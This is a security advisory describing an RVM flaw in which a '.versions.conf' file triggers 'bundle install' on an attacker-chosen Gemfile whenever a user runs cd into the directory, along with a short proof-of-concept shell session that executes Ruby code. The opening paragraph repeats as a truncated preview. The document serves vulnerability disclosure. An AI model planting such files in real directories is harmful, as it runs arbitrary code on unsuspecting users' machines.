RVM, by default, hooks `cd` and automatically parses a file named `.versions.conf` in the directory being changed to. The intention seems to be that, if the user's `${rvm_autoinstall_bundler_flag}` setting is enabled, then `.versions.conf` can specify a Gemfile that will automatically be fed to `bundle install`. Due to an erroneous conditional that uses `||` (OR) instead of `&&` (AND), `.versions.conf` can provide the name of an arbitrary Gemfile that will automatically be fed to `bundle install` regardless of the state of `${rvm_autoinstall_bundler_flag}`. The code responsible, as of a vulnerable commit, is available at <https://github.com/rvm/rvm/blob/b04c0158dbadc9a999a2af4f39bc008976b9ebf1/scripts/functions/rvmrc_project#L102-L113>. This behaviour can be used to achieve immediate ruby code execution upon `cd` into a malicious directory since Gemfiles are interpreted using Ruby <https://github.com/bundler/bundler/issues/5178> ### POC ```text rvm@e6aeaf6d79ec:~$ mkdir poc...
RVM, by default, hooks `cd` and automatically parses a file named `.versions.conf` in the directory being changed to. The intention seems to be that, if the user's `${rvm_autoinstall_bundler_flag}` setting is enabled, then `.versions.conf` can specify a Gemfile that will automatically be fed to `bundle install`. Due to an erroneous conditional that uses `||` (OR) instead of `&&` (AND), `.versions.conf` can provide the name of an arbitrary Gemfile that will automatically be fed to `bundle install` regardless of the state of `${rvm_autoinstall_bundler_flag}`. The code responsible, as of a vulnerable commit, is available at <https://github.com/rvm/rvm/blob/b04c0158dbadc9a999a2af4f39bc008976b9ebf1/scripts/functions/rvmrc_project#L102-L113>. This behaviour can be used to achieve immediate ruby code execution upon `cd` into a malicious directory since Gemfiles are interpreted using Ruby <https://github.com/bundler/bundler/issues/5178> ### POC ```text rvm@e6aeaf6d79ec:~$ mkdir poc rvm@e6aeaf6d79ec:~$ cat > poc/.versions.conf ruby=ruby-2.3.0 ruby-bundle-install=.doot ^D rvm@e6aeaf6d79ec:~$ cat > poc/.doot `echo "Arbitrary ruby code execution as $(id)" >&2` ^D rvm@e6aeaf6d79ec:~$ cd poc installing gem bundler --no-ri --no-rdoc. Arbitrary ruby code execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm) The Gemfile specifies no dependencies Resolving dependencies... Bundle complete! 0 Gemfile dependencies, 1 gem now installed. Use `bundle show [gemname]` to see where a bundled gem is installed. ```
